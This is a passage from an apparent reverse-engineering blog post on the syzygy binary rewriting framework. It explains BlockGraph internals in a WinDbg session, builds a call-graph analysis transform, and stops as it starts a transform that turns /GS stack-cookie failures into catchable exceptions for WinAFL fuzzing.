The terminology used across the project can be a bit misleading or confusing at first, so this is a good time to describe the key terms and their meanings: a BlockGraph is basically a container of blocks. A BlockGraph::Block can be either a code block or a data block (the IMAGE_NT_HEADERS, for example). Every block has various properties, like an identifier, a name, etc., and belongs to a section (as in PE sections). Most of those properties are mutable, and you are free to play with them; they will get picked up by the back-end when relinking the output image. In addition to being a top-level container of blocks, the BlockGraph also keeps track of the sections in your executable. Blocks also have a concept of referrers and references. A reference is basically a link from Block foo to Block bar, where bar is the referent. A referrer can be seen as a cross-reference (in the IDA sense): foo would be a referrer of bar. These two key concepts are very important when building transforms as they allow you to walk the graph faster. Transferring the referrers of a Block to another Block, for example, is a very easy operation (and is super powerful).

Something that also confused me at first is that a Block is not a basic block as we know them; instead, it is a function, i.e. a set of basic blocks. Another key concept is called SourceRanges: as Blocks can be combined together or split apart, each Block maintains its own address-space map tying bytes from the original image to bytes in the block.

Finally, the container of basic-blocks as we know them is a BasicBlockSubGraph (I briefly mention it a bit later in the post).

Oh, one last thing: the instrumenter is basically the application that decomposes an input binary (comparable to a front-end), presents the deconstructed binary (functions, blocks, instructions) to transforms (comparable to a mid-end) that modify it, and finally relinks everything (the back-end) to reconstruct your instrumented binary.

Debugging session

To make things clearer - and because I like debugging sessions - I think it is worthwhile to spend a bit of time in a debugger actually seeing the various structures and how they map to some code we know. Let's take the following C program and compile it in debug mode (don't forget to enable the full PDB generation with the following linker flag: /PROFILE):

#include <stdio.h>

void foo(int x) {
  for(int i = 0; i < x; ++i) {
    printf("Binary rewriting with syzygy\n");
  }
}

int main(int argc, char *argv[]) {
  printf("Hello doar-e.\n");
  foo(argc);
  return 0;
}

Throw it to your favorite debugger with the following command - we will use the afl transformation as an example transform to analyze the data we have available to us:

instrument.exe --mode=afl --input-image=test.exe --output-image=test.instr.exe

And let's place this breakpoint:

bm instrument!*AFLTransform::OnBlock ".if(@@c++(block->type_ == 0)){ }.else{ g }"

Now it's time to inspect the Block associated with our function foo from above:

0:000> g
eax=002dcf80 ebx=00000051 ecx=00482da8 edx=004eaba0 esi=004bd398 edi=004bd318
eip=002dcf80 esp=0113f4b8 ebp=0113f4c8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
instrument!instrument::transforms::AFLTransform::OnBlock:
002dcf80 55              push    ebp

0:000> dx block
  [+0x000] id_              : 0x51
  [+0x004] type_            : CODE_BLOCK (0)
  [+0x008] size_            : 0x5b
  [+0x00c] alignment_       : 0x1
  [+0x010] alignment_offset_ : 0
  [+0x014] padding_before_  : 0x0
  [+0x018] name_            : 0x4ffc70 : "foo"
  [+0x01c] compiland_name_  : 0x4c50b0 : "D:\tmp\test\Debug\main.obj"
  [+0x020] addr_            [Type: core::detail::AddressImpl<0>]
  [+0x024] block_graph_     : 0x48d10c
  [+0x028] section_         : 0x0
  [+0x02c] attributes_      : 0x8
  [+0x030] references_      : { size=0x3 }
  [+0x038] referrers_       : { size=0x1 }
  [+0x040] source_ranges_   [Type: core::AddressRangeMap<core::AddressRange<int,unsigned int>,core::AddressRange<core::detail::AddressImpl<0>,unsigned int> >]
  [+0x04c] labels_          : { size=0x3 }
  [+0x054] owns_data_       : false
  [+0x058] data_            : 0x49ef50 : 0x55
  [+0x05c] data_size_       : 0x5b

The above shows us the different properties available in a Block; we can see it is named foo, has the identifier 0x51 and a size of 0x5B bytes.

[Image: foo_idaview.png - the foo function in IDA]

It also has one referrer and 3 references; what could they be? With the explanation I gave above, we can guess that the referrer (or cross-reference) must be the main function, as it calls into foo:

0:000> dx -r1 (*((instrument!std::pair<block_graph::BlockGraph::Block *,int> *)0x4f87c0))
  first            : 0x4bd3ac
  second           : 48

0:000> dx -r1 (*((instrument!block_graph::BlockGraph::Block *)0x4bd3ac))
    [+0x000] id_              : 0x52
    [+0x004] type_            : CODE_BLOCK (0)
    [+0x008] size_            : 0x4d
    [+0x00c] alignment_       : 0x1
    [+0x010] alignment_offset_ : 0
    [+0x014] padding_before_  : 0x0
    [+0x018] name_            : 0x4c51a0 : "main"
    [+0x01c] compiland_name_  : 0x4c50b0 : "D:\tmp\test\Debug\main.obj"
    [+0x020] addr_            [Type: core::detail::AddressImpl<0>]
    [+0x024] block_graph_     : 0x48d10c
    [+0x028] section_         : 0x0
    [+0x02c] attributes_      : 0x8
    [+0x030] references_      : { size=0x4 }
    [+0x038] referrers_       : { size=0x1 }
    [+0x040] source_ranges_   [Type: core::AddressRangeMap<core::AddressRange<int,unsigned int>,core::AddressRange<core::detail::AddressImpl<0>,unsigned int> >]
    [+0x04c] labels_          : { size=0x3 }
    [+0x054] owns_data_       : false
    [+0x058] data_            : 0x49efb0 : 0x55
    [+0x05c] data_size_       : 0x4d

Something to keep in mind when it comes to references is that they are not simply a pointer to a block. A reference does indeed reference a block (duh), but it also carries an offset into that block to point exactly at where the data is being referenced from.

// Represents a reference from one block to another. References may be offset.
// That is, they may refer to an object at a given location, but actually point
// to a location that is some fixed distance away from that object. This allows,
// for example, non-zero based indexing into a table. The object that is
// intended to be dereferenced is called the 'base' of the offset.
//
// BlockGraph references are from a location (offset) in one block, to some
// location in another block. The referenced block itself plays the role of the
// 'base' of the reference, with the offset of the reference being stored as
// an integer from the beginning of the block. However, basic block
// decomposition requires breaking the block into smaller pieces and thus we
// need to carry around an explicit base value, indicating which byte in the
// block is intended to be referenced.
//
// A direct reference to a location will have the same value for 'base' and
// 'offset'.
//
// Here is an example:
//
//        /----------\
//        +---------------------------+
//  O     |          B                | <--- Referenced block
//        +---------------------------+      B = base
//  \-----/                                  O = offset
//

Let's have a look at the references associated with the foo block now. If you look closely at the block, the set of references is of size 3... what could they be?

One for the printf function, and one for the data Block holding the string passed to printf, maybe?

First reference:
----------------

0:000> dx -r1 (*((instrument!std::pair<int const ,block_graph::BlockGraph::Reference> *)0x4f5640))
    first            : 57
    second           [Type: block_graph::BlockGraph::Reference]
0:000> dx -r1 (*((instrument!block_graph::BlockGraph::Reference *)0x4f5644))
    [+0x000] type_            : ABSOLUTE_REF (1) [Type: block_graph::BlockGraph::ReferenceType]
    [+0x004] size_            : 0x4
    [+0x008] referenced_      : 0x4ce334
    [+0x00c] offset_          : 0
    [+0x010] base_            : 0
0:000> dx -r1 (*((instrument!block_graph::BlockGraph::Block *)0x4ce334))
    [+0x000] id_              : 0xbc
    [+0x004] type_            : DATA_BLOCK (1)
[...]
    [+0x018] name_            : 0xbb90f8 : "??_C@_0BO@LBGMPKED@Binary?5rewriting?5with?5syzygy?6?$AA@"
    [+0x01c] compiland_name_  : 0x4c50b0 : "D:\tmp\test\Debug\main.obj"
[...]
    [+0x058] data_            : 0x4a11e0 : 0x42
    [+0x05c] data_size_       : 0x1e
0:000> da 0x4a11e0
004a11e0  "Binary rewriting with syzygy."

Second reference:
-----------------

0:000> dx -r1 (*((instrument!std::pair<int const ,block_graph::BlockGraph::Reference> *)0x4f56a0))
    first            : 62
    second           [Type: block_graph::BlockGraph::Reference]
0:000> dx -r1 (*((instrument!block_graph::BlockGraph::Reference *)0x4f56a4))
    [+0x000] type_            : PC_RELATIVE_REF (0) [Type: block_graph::BlockGraph::ReferenceType]
    [+0x004] size_            : 0x4
    [+0x008] referenced_      : 0x4bd42c
    [+0x00c] offset_          : 0
    [+0x010] base_            : 0
0:000> dx -r1 (*((instrument!block_graph::BlockGraph::Block *)0x4bd42c))
    [+0x000] id_              : 0x53
    [+0x004] type_            : CODE_BLOCK (0)
[...]
    [+0x018] name_            : 0x4ffd60 : "printf"
    [+0x01c] compiland_name_  : 0x4c50b0 : "D:\tmp\test\Debug\main.obj"
[...]

Third reference:
----------------

0:000> dx -r1 (*((instrument!std::pair<int const ,block_graph::BlockGraph::Reference> *)0x4f5a90))
    first            : 83
    second           [Type: block_graph::BlockGraph::Reference]
0:000> dx -r1 (*((instrument!block_graph::BlockGraph::Reference *)0x4f5a94))
    [+0x000] type_            : PC_RELATIVE_REF (0) [Type: block_graph::BlockGraph::ReferenceType]
    [+0x004] size_            : 0x4
    [+0x008] referenced_      : 0x4bd52c
    [+0x00c] offset_          : 0
    [+0x010] base_            : 0
0:000> dx -r1 (*((instrument!block_graph::BlockGraph::Block *)0x4bd52c))
    [+0x000] id_              : 0x54
    [+0x004] type_            : CODE_BLOCK (0)
[...]
    [+0x018] name_            : 0xbb96c8 : "_RTC_CheckEsp"
    [+0x01c] compiland_name_  : 0x4c5260 : "f:\binaries\Intermediate\vctools\msvcrt.nativeproj_607447030\objd\x86\_stack_.obj"
[...]

Perfect - that's what we sort of guessed! The last one is just the compiler adding Run-Time Error Checks on us.

Let's have a closer look at the first reference. The references_ member is a map of offsets to Reference instances.

// Map of references that this block makes to other blocks.
typedef std::map<Offset, Reference> ReferenceMap;

The offset tells you where exactly in the foo block the reference lives; in our case we can see that the first reference is at offset 57 from the base of the block. As foo starts at 0x401090 (RVA 0x1090, as the SourceRanges dump below confirms), 0x401090 + 57 = 0x4010C9. If you start IDA real quick and browse to this address, you will see that it points one byte after the PUSH opcode at 0x4010C8 - exactly on the reference to the _Format string:

.text:004010C8 68 20 41 40 00 push    offset _Format  ; "Binary rewriting with syzygy\n"

Another interesting bit I didn't mention earlier is that naturally the data_ field backs the actual content of the Block:

0:000> u @@c++(block->data_)
0049ef50 55              push    ebp
0049ef51 8bec            mov     ebp,esp
0049ef53 81eccc000000    sub     esp,0CCh
0049ef59 53              push    ebx
0049ef5a 56              push    esi
0049ef5b 57              push    edi
0049ef5c 8dbd34ffffff    lea     edi,[ebp-0CCh]
0049ef62 b933000000      mov     ecx,33h

[Image: foo_disassview.png - disassembly of foo]

Last but not least, I mentioned SourceRanges before (you can see it as a vector of pairs mapping data ranges in the binary to content in memory), so let's dump it to see what it looks like:

0:000> dx -r1 (*((instrument!core::AddressRangeMap<core::AddressRange<int,unsigned int>,core::AddressRange<core::detail::AddressImpl<0>,unsigned int> > *)0x4bd36c))
    [+0x000] range_pairs_     : { size=1 }
0:000> dx -r1 (*((instrument!std::vector<std::pair<core::AddressRange<int,unsigned int>,core::AddressRange<core::detail::AddressImpl<0>,unsigned int> >,std::allocator<std::pair<core::AddressRange<int,unsigned int>,core::AddressRange<core::detail::AddressImpl<0>,unsigned int> > > > *)0x4bd36c))
    [0]              : {...}, {...}
0:000> dx -r1 (*((instrument!std::pair<core::AddressRange<int,unsigned int>,core::AddressRange<core::detail::AddressImpl<0>,unsigned int> > *)0x4da1c8))
    first            [Type: core::AddressRange<int,unsigned int>]
    second           [Type: core::AddressRange<core::detail::AddressImpl<0>,unsigned int>]
0:000> dx -r1 (*((instrument!core::AddressRange<int,unsigned int> *)0x4da1c8))
    [+0x000] start_           : 0
    [+0x004] size_            : 0x5b
0:000> dx -r1 (*((instrument!core::AddressRange<core::detail::AddressImpl<0>,unsigned int> *)0x4da1d0))
    [+0x000] start_           [Type: core::detail::AddressImpl<0>]
    [+0x004] size_            : 0x5b
0:000> dx -r1 (*((instrument!core::detail::AddressImpl<0> *)0x4da1d0))
    [+0x000] value_           : 0x1090 [Type: unsigned int]

In this SourceRanges, we have a mapping from the DataRange (offset 0, size 0x5B) to the SourceRange (RVA 0x1090, size 0x5B - which matches the previous IDA screenshot, obviously). We will come back to those once we have actually modified / rewritten the blocks to see what happens to the SourceRanges.

enum AddressType : uint8_t {
  kRelativeAddressType,
  kAbsoluteAddressType,
  kFileOffsetAddressType,
};

// This class implements an address in a PE image file.
// Addresses are of three varieties:
// - Relative addresses are relative to the base of the image, and thus do not
//   change when the image is relocated. Bulk of the addresses in the PE image
//   format itself are of this variety, and that's where relative addresses
//   crop up most frequently.
// [...]
// This class is a lightweight wrapper for an integer, which can be freely
// copied. The different address types are deliberately assignment
// incompatible, which helps to avoid confusion when handling different
// types of addresses in implementation.
template <AddressType kType>
class AddressImpl {};

// A virtual address relative to the image base, often termed RVA in
// documentation and in data structure comments.
using RelativeAddress = detail::AddressImpl<kRelativeAddressType>;

Now that you have been introduced to the main concepts, it is time for me to walk you through two small applications.

CallGraphAnalysis

The plan

As the framework exposes all the information you need to rewrite and analyze a binary, you are also free to just analyze it and not modify a single bit. In this example, let's write a Block transform that generates a graph of the relationships between code Blocks (functions). As we are interested in exploring the whole binary and every single code Block, we subclass IterativeTransformImpl:

// Declares a BlockGraphTransform implementation wrapping the common transform
// that iterates over each block in the image.


// An implementation of a BlockGraph transform encapsulating the simple pattern
// of Pre, per-block, and Post functions. The derived class is responsible for
// implementing 'OnBlock' and 'name', and may optionally override Pre and
// Post. The derived type needs to also define the static public member
// variable:
//
//   static const char DerivedType::kTransformName[];
//
// @tparam DerivedType the type of the derived class.
template<class DerivedType>
class IterativeTransformImpl
    : public NamedBlockGraphTransformImpl<DerivedType> { };

Doing so allows us to define Pre / Post functions, and an OnBlock function that gets called for every Block encountered in the image. This is pretty handy: I can define an OnBlock callback to mine the information we want for every Block, and define Post to process the accumulated data if necessary.

The OnBlock function should be pretty light as we only want to achieve a couple of things:

  1. Make sure we are dealing with a code Block (and not data),
  2. Walk every referrer and store pairs of [ReferrerBlock, CurrentBlock] in a container.

Implementation

The first thing to do is to create a C++ class named CallGraphAnalysis, declared in doare_transforms.h and defined in doare_transforms.cc. Those files go in the syzygy/instrument/transforms directory where all the other transforms live:

D:\syzygy\src>git status
On branch dev-doare1
Changes to be committed:
  (use "git reset HEAD <file>..." to unstage)

        new file:   syzygy/instrument/transforms/doare_transforms.cc
        new file:   syzygy/instrument/transforms/doare_transforms.h

In order to get it compiled we also need to modify the instrument.gyp project file:

D:\syzygy\src>git diff syzygy/instrument/instrument.gyp
diff --git a/syzygy/instrument/instrument.gyp b/syzygy/instrument/instrument.gyp
index 464c5566..c0eceb87 100644
--- a/syzygy/instrument/instrument.gyp
+++ b/syzygy/instrument/instrument.gyp
@@ -68,6 +70,8 @@
          'transforms/branch_hook_transform.h',
          'transforms/coverage_transform.cc',
          'transforms/coverage_transform.h',
+        'transforms/doare_transforms.cc',
+        'transforms/doare_transforms.h',
          'transforms/entry_call_transform.cc',
          'transforms/entry_call_transform.h',
          'transforms/entry_thunk_transform.cc',

The gyp file is used to generate the Ninja project files - which means that if you don't regenerate the Ninja files from the updated version of this gyp file, you will not be compiling your new code. To force a regeneration, you can invoke the depot_tools command gclient runhooks.
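
Concretely, assuming depot_tools is on your PATH, regenerating and rebuilding looks like this (the ninja invocation is the same one used at the end of this section):

D:\syzygy\src>gclient runhooks

D:\syzygy\src>ninja -C out\Release instrument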

At this point we are ready to get our class coded up; here is the class declaration I have:

// Axel '0vercl0k' Souchet - 26 Aug 2017

#ifndef SYZYGY_INSTRUMENT_TRANSFORMS_DOARE_TRANSFORMS_H_
#define SYZYGY_INSTRUMENT_TRANSFORMS_DOARE_TRANSFORMS_H_

#include "base/logging.h"
#include "syzygy/block_graph/transform_policy.h"
#include "syzygy/block_graph/transforms/iterative_transform.h"
#include "syzygy/block_graph/transforms/named_transform.h"

namespace instrument {
namespace transforms {

typedef block_graph::BlockGraph BlockGraph;
typedef block_graph::BlockGraph::Block Block;
typedef block_graph::TransformPolicyInterface TransformPolicyInterface;

class CallGraphAnalysis
    : public block_graph::transforms::IterativeTransformImpl<
          CallGraphAnalysis> {
  public:
  CallGraphAnalysis()
      : edges_(),
        main_block_(nullptr),
        total_blocks_(0),
        total_code_blocks_(0) {}

  static const char kTransformName[];

  // Functions needed for IterativeTransform.
  bool OnBlock(const TransformPolicyInterface* policy,
                BlockGraph* block_graph,
                Block* block);

  private:
  std::list<std::pair<Block*, Block*>> edges_;
  Block* main_block_;

  // Stats.
  size_t total_blocks_;
  size_t total_code_blocks_;
};

}  // namespace transforms
}  // namespace instrument

#endif  // SYZYGY_INSTRUMENT_TRANSFORMS_DOARE_TRANSFORMS_H_

After declaring it, the interesting part for us is to have a look at the OnBlock method:

bool CallGraphAnalysis::OnBlock(const TransformPolicyInterface* policy,
                                BlockGraph* block_graph,
                                Block* block) {
  total_blocks_++;

  if (block->type() != BlockGraph::CODE_BLOCK)
    return true;

  if (block->attributes() & BlockGraph::GAP_BLOCK)
    return true;

  VLOG(1) << __FUNCTION__ << ": " << block->name();
  if (block->name() == "main") {
    main_block_ = block;
  }

  // Walk the referrers of this block.
  for (const auto& referrer : block->referrers()) {
    Block* referrer_block(referrer.first);

    // We are not interested in non-code referrers.
    if (referrer_block->type() != BlockGraph::CODE_BLOCK) {
      continue;
    }

    VLOG(1) << referrer_block->name() << " -> " << block->name();

    // Keep track of the relation between the block & its referrer.
    edges_.emplace_back(referrer_block, block);
  }

  total_code_blocks_++;
  return true;
}

The first step of the method is to make sure that the Block we are dealing with is a Block we want to analyze. As I explained before, Blocks are not exclusively code Blocks; that is why we check the type of the block to accept only code Blocks. Another type of Block, which syzygy artificially creates (it has no existence in the image being analyzed), is the GAP_BLOCK: basically a block that fills a gap in the address space. For that reason we also skip those blocks.

At this point we have a code Block and we can start to mine whatever information we need: name, size, referrers, etc. As what we are mostly interested in is the relationships between code Blocks, we have to walk the referrers. The only thing to be wary of is to also exclude data Blocks there (a function pointer table would be a data Block referencing a code Block, for example). After this minor filtering we can just add the two pointers into the container.

I am sure at this stage you are interested in compiling it and getting it to run on a binary. To do that we need to add the plumbing necessary to surface it to the instrument.exe tool. The first thing you need is an instrumenter; we declare it in doare_instrumenter.h and define it in doare_instrumenter.cc in the syzygy/instrument/instrumenters directory:

D:\syzygy\src>git status
On branch dev-doare1
Changes to be committed:
  (use "git reset HEAD <file>..." to unstage)

        new file:   syzygy/instrument/instrumenters/doare_instrumenter.cc
        new file:   syzygy/instrument/instrumenters/doare_instrumenter.h

An instrumenter is basically a class that encapsulates the configuration and the invocation of one or several transforms. The instrumenter can receive options passed by the application, and thus can set configuration flags when invoking the transforms, etc. You could imagine parsing a configuration file here, or doing any preparation needed by your transform. Then, the instrumenter registers the transform against the Relinker object (a bit like the pass manager in LLVM, if you want to think about it this way).

Anyway, as our transform is trivial we basically don't need any of this "preparation"; so let's settle for the least required:

// Axel '0vercl0k' Souchet - 26 Aug 2017

#ifndef SYZYGY_INSTRUMENT_INSTRUMENTERS_DOARE_INSTRUMENTER_H_
#define SYZYGY_INSTRUMENT_INSTRUMENTERS_DOARE_INSTRUMENTER_H_

#include "base/command_line.h"
#include "syzygy/instrument/instrumenters/instrumenter_with_agent.h"
#include "syzygy/instrument/transforms/doare_transforms.h"
#include "syzygy/pe/pe_relinker.h"

namespace instrument {
namespace instrumenters {

class DoareInstrumenter : public InstrumenterWithRelinker {
  public:
  typedef InstrumenterWithRelinker Super;

  DoareInstrumenter() : Super() {}

  // From InstrumenterWithRelinker
  bool InstrumentPrepare() override;
  bool InstrumentImpl() override;
  const char* InstrumentationMode() override;

  private:
  // The transform for this agent.
  std::unique_ptr<instrument::transforms::CallGraphAnalysis>
      transformer_callgraph_;

  DISALLOW_COPY_AND_ASSIGN(DoareInstrumenter);
};

}  // namespace instrumenters
}  // namespace instrument

#endif  // SYZYGY_INSTRUMENT_INSTRUMENTERS_DOARE_INSTRUMENTER_H_

The InstrumentImpl method is where the instrumenter registers the transform against the relinker object:

// Axel '0vercl0k' Souchet - 26 Aug 2017

#include "syzygy/instrument/instrumenters/doare_instrumenter.h"

#include "base/logging.h"
#include "base/values.h"
#include "syzygy/application/application.h"

namespace instrument {
namespace instrumenters {

bool DoareInstrumenter::InstrumentPrepare() {
  return true;
}

bool DoareInstrumenter::InstrumentImpl() {
  transformer_callgraph_.reset(new instrument::transforms::CallGraphAnalysis());

  if (!relinker_->AppendTransform(transformer_callgraph_.get())) {
    LOG(ERROR) << "AppendTransform failed.";
    return false;
  }

  return true;
}

const char* DoareInstrumenter::InstrumentationMode() {
  return "Diary of a reverse engineer";
}
}  // namespace instrumenters
}  // namespace instrument

Like before, we also need to add those two files in the instrument.gyp file and regenerate the Ninja project files via the gclient runhooks command:

D:\syzygy\src>git diff syzygy/instrument/instrument.gyp
diff --git a/syzygy/instrument/instrument.gyp b/syzygy/instrument/instrument.gyp
index 464c5566..c0eceb87 100644
--- a/syzygy/instrument/instrument.gyp
+++ b/syzygy/instrument/instrument.gyp
@@ -36,6 +36,8 @@
          'instrumenters/bbentry_instrumenter.h',
          'instrumenters/coverage_instrumenter.cc',
          'instrumenters/coverage_instrumenter.h',
+        'instrumenters/doare_instrumenter.h',
+        'instrumenters/doare_instrumenter.cc',
          'instrumenters/entry_call_instrumenter.cc',
          'instrumenters/entry_call_instrumenter.h',
          'instrumenters/entry_thunk_instrumenter.cc',
@@ -68,6 +70,8 @@
          'transforms/branch_hook_transform.h',
          'transforms/coverage_transform.cc',
          'transforms/coverage_transform.h',
+        'transforms/doare_transforms.cc',
+        'transforms/doare_transforms.h',
          'transforms/entry_call_transform.cc',
          'transforms/entry_call_transform.h',
          'transforms/entry_thunk_transform.cc',

The last step for us is to surface our instrumenter in the application's main. I just added a mode called doare that you can select via the --mode switch; if the flag is specified, it instantiates the newly born DoareInstrumenter.

D:\syzygy\src>git diff syzygy/instrument/instrument_app.cc
diff --git a/syzygy/instrument/instrument_app.cc b/syzygy/instrument/instrument_app.cc
index 72bb40b8..c54258d8 100644
--- a/syzygy/instrument/instrument_app.cc
+++ b/syzygy/instrument/instrument_app.cc
@@ -29,6 +29,7 @@
  #include "syzygy/instrument/instrumenters/bbentry_instrumenter.h"
  #include "syzygy/instrument/instrumenters/branch_instrumenter.h"
  #include "syzygy/instrument/instrumenters/coverage_instrumenter.h"
+#include "syzygy/instrument/instrumenters/doare_instrumenter.h"
  #include "syzygy/instrument/instrumenters/entry_call_instrumenter.h"
  #include "syzygy/instrument/instrumenters/entry_thunk_instrumenter.h"
  #include "syzygy/instrument/instrumenters/flummox_instrumenter.h"
@@ -41,7 +42,7 @@ static const char kUsageFormatStr[] =
      "Usage: %ls [options]\n"
      "  Required arguments:\n"
      "    --input-image=<path> The input image to instrument.\n"
-    "    --mode=afl|asan|bbentry|branch|calltrace|coverage|flummox|profile\n"
+    "    --mode=afl|asan|bbentry|branch|calltrace|coverage|doare|flummox|profile\n"
      "                            Specifies which instrumentation mode is to\n"
      "                            be used. If this is not specified it is\n"
      "                            equivalent to specifying --mode=calltrace\n"
@@ -192,6 +193,8 @@ bool InstrumentApp::ParseCommandLine(const base::CommandLine* cmd_line) {
            instrumenters::EntryThunkInstrumenter::CALL_TRACE));
      } else if (base::LowerCaseEqualsASCII(mode, "coverage")) {
        instrumenter_.reset(new instrumenters::CoverageInstrumenter());
+    } else if (base::LowerCaseEqualsASCII(mode, "doare")) {
+      instrumenter_.reset(new instrumenters::DoareInstrumenter());
      } else if (base::LowerCaseEqualsASCII(mode, "flummox")) {
        instrumenter_.reset(new instrumenters::FlummoxInstrumenter());
      } else if (base::LowerCaseEqualsASCII(mode, "profile")) {

This should be it! Recompiling the instrument project should be enough to be able to invoke the transform and see some of our debug messages:

D:\Downloads\syzygy\src>ninja -C out\Release instrument
ninja: Entering directory `out\Release'
[4/4] LINK_EMBED instrument.exe

D:\Downloads\syzygy\src>out\Release\instrument.exe --input-image=out\Release\instrument.exe --output-image=nul --mode=doare --verbose
[...]
[0902/120452:VERBOSE1:doare_transforms.cc(22)] instrument::transforms::CallGraphAnalysis::OnBlock: block_graph::BlockGraph::AddressSpace::GetBlockByAddress
[0902/120452:VERBOSE1:doare_transforms.cc(36)] pe::`anonymous namespace'::Decompose -> block_graph::BlockGraph::AddressSpace::GetBlockByAddress
[0902/120452:VERBOSE1:doare_transforms.cc(36)] pe::`anonymous namespace'::Decompose -> block_graph::BlockGraph::AddressSpace::GetBlockByAddress
[...]

Visualize it?

As I was writing this, I figured it might be worth spending a bit of time trying to visualize this network to make it more attractive for the readers. So I decided to use visjs and the Post callback to output the call-graph in a way visjs would understand:

bool CallGraphAnalysis::PostBlockGraphIteration(
    const TransformPolicyInterface* policy,
    BlockGraph* block_graph,
    Block* header_block) {
  VLOG(1) << "      Blocks found: " << total_blocks_;
  VLOG(1) << " Code Blocks found: " << total_code_blocks_;

  if (main_block_ == nullptr) {
    LOG(ERROR) << "A 'main' block is mandatory.";
    return false;
  }

  // Now we walk the graph from the 'main' block, with a BFS algorithm.
  uint32_t idx = 0, level = 0;
  std::list<std::pair<Block*, Block*>> selected_edges;
  std::map<Block*, uint32_t> selected_nodes;
  std::map<Block*, uint32_t> selected_nodes_levels;
  std::set<Block*> nodes_to_inspect{main_block_};
  while (nodes_to_inspect.size() > 0) {
    // Make a copy of the nodes to inspect so that we can iterate
    // over them.
    std::set<Block*> tmp = nodes_to_inspect;

    // The nodes selected to be inspected in the next iteration of
    // the loop will be added to this set.
    nodes_to_inspect.clear();

    // Go through every node to find which nodes it is connected to.
    for (const auto& node_to_inspect : tmp) {
      // Assign an index and a level to the node.
      selected_nodes.emplace(node_to_inspect, idx++);
      selected_nodes_levels[node_to_inspect] = level;

      // Now let's iterate through the edges to find which nodes the
      // current one is connected to.
      for (const auto& edge : edges_) {
        // We are interested to find edges connected to the current node.
        if (edge.first != node_to_inspect) {
          continue;
        }

        // Get the connected node and make sure we haven't handled it already.
        Block* to_block(edge.second);
        if (selected_nodes.count(to_block) > 0) {
          continue;
        }

        selected_nodes.emplace(to_block, idx++);
        selected_nodes_levels[to_block] = level + 1;

        // Keep track of this edge.
        selected_edges.emplace_back(node_to_inspect, to_block);

        // We need to analyze this block at the next iteration (level + 1).
        nodes_to_inspect.insert(to_block);
      }
    }

    // Bump the level as we finished analyzing the nodes we wanted to inspect.
    level++;
  }

  std::cout << "var nodes = new vis.DataSet([" << std::endl;
  for (const auto& node : selected_nodes) {
    Block* block(node.first);
    const char* compiland_path = block->compiland_name().c_str();
    const char* compiland_name = strrchr(compiland_path, '\\');
    char description[1024];

    if (compiland_name != nullptr) {
      compiland_name++;
    } else {
      compiland_name = "Unknown";
    }

    uint32_t level = selected_nodes_levels[block];
    _snprintf_s(description, ARRAYSIZE(description), _TRUNCATE,
                "RVA: %p<br>Size: %d<br>Level: %d<br>Compiland: %s",
                (void*)block->addr().value(), block->size(), level,
                compiland_name);

    std::cout << "  { id : " << node.second << ", label : \"" << block->name()
              << "\", "
              << "title : '" << description << "', group : " << level
              << ", value : " << block->size() << " }," << std::endl;
  }
  std::cout << "]);" << std::endl
            << std::endl;

  std::cout << "var edges = new vis.DataSet([" << std::endl;
  for (const auto& edge : selected_edges) {
    std::cout << "  { from : " << selected_nodes.at(edge.first)
              << ", to : " << selected_nodes.at(edge.second) << " },"
              << std::endl;
  }
  std::cout << "]);" << std::endl;
  return true;
}

The above function starts walking the network from the main function using a BFS (which allows us to assign a level to each Block). It then outputs two sets of data: the nodes and the edges.

If you would like to check out the result I have uploaded an interactive network graph here: network.afl-fuzz.exe.html. Even though it sounds pretty useless, it looks pretty cool!

SecurityCookieCheckHookTransform

The problem

The idea for this transform came about when I was playing around with WinAFL; I encountered a case where one of the test-cases triggered a /GS violation in a harness program I was fuzzing. Buffer security checks are a set of compiler and runtime instrumentation aimed at detecting and preventing the exploitation of stack-based buffer overflows. A cookie is placed on the stack by the prologue of a protected function, in between the local variables of the stack-frame and the saved stack pointer / saved instruction pointer. The compiler instruments the code so that before the function returns, it invokes a check function (called __security_check_cookie) that ensures the integrity of the cookie.

; void __fastcall __security_check_cookie(unsigned int cookie)
@__security_check_cookie@4 proc near
cookie= dword ptr -4
    cmp     ecx, ___security_cookie
    repne jnz short failure
    repne retn
failure:
    repne jmp ___report_gsfailure
@__security_check_cookie@4 endp

If the cookie matches the secret, everything is fine: the function returns and life goes on. If it does not, it means something overwrote it, and as a result the process needs to be killed. The way the check function achieves this is by raising an exception that the process cannot even catch itself - which makes sense if you think about it, as you don't want an attacker to be able to hijack the exception.

On recent versions of Windows, this is achieved via a fail-fast exception or by invoking [UnhandledExceptionFilter](https://msdn.microsoft.com/en-us/library/windows/desktop/ms681401(v=vs.85).aspx) (after forcing the top level exception filter to 0) and terminating the process (done by __raise_securityfailure).

; void __cdecl __raise_securityfailure(_EXCEPTION_POINTERS *const exception_pointers)
___raise_securityfailure proc near
exception_pointers= dword ptr  8
    push    ebp
    mov     ebp, esp
    push    0
    call    ds:__imp__SetUnhandledExceptionFilter@4
    mov     eax, [ebp+exception_pointers]
    push    eax
    call    ds:__imp__UnhandledExceptionFilter@4
    push    0C0000409h
    call    ds:__imp__GetCurrentProcess@0
    push    eax
    call    ds:__imp__TerminateProcess@8
    pop     ebp
    retn
___raise_securityfailure endp

Funny enough - if this sounds familiar - turns out I have encountered this very problem a while back and you can read the story here: Having a Look at the Windows' User/Kernel Exceptions Dispatcher.

The thing is, when you are fuzzing, this is exactly the type of thing you would like to be aware of. WinAFL uses an in-process exception handler to do the crash monitoring part, which means that crashes of this type would not go through the crash monitoring. Bummer.

The solution

I started evaluating syzygy with this simple task: making the program crash with a regular exception (that can get caught by an in-process exception handler). I figured it would be a walk in the park, as I basically needed to apply very little transformation to the binary to make this work.

The first step is to define a transform as in the previous example. This time I subclass NamedBlockGraphTransformImpl, which wants me to implement a TransformBlockGraph method that receives: a transform policy (used to make decisions before applying transformations), the graph (block_graph) and a data Block that represents the PE header of our image (header_block):

class SecurityCookieCheckHookTransform
    : public block_graph::transforms::NamedBlockGraphTransformImpl<
          SecurityCookieCheckHookTransform> {
  public:
  SecurityCookieCheckHookTransform() {}

  static const char kTransformName[];
  static const char kReportGsFailure[];
  static const char kSyzygyReportGsFailure[];
  static const uint32_t kInvalidUserAddress;

  // BlockGraphTransformInterface implementation.
  bool TransformBlockGraph(const TransformPolicyInterface* policy,
                            BlockGraph* block_graph,
                            BlockGraph::Block* header_block) final;
};

As I explained a bit earlier, the BlockGraph is the top-level container of Blocks. This is what I walk through in order to find our Block of interest, the one named __report_gsfailure:

BlockGraph::Block* report_gsfailure = nullptr;
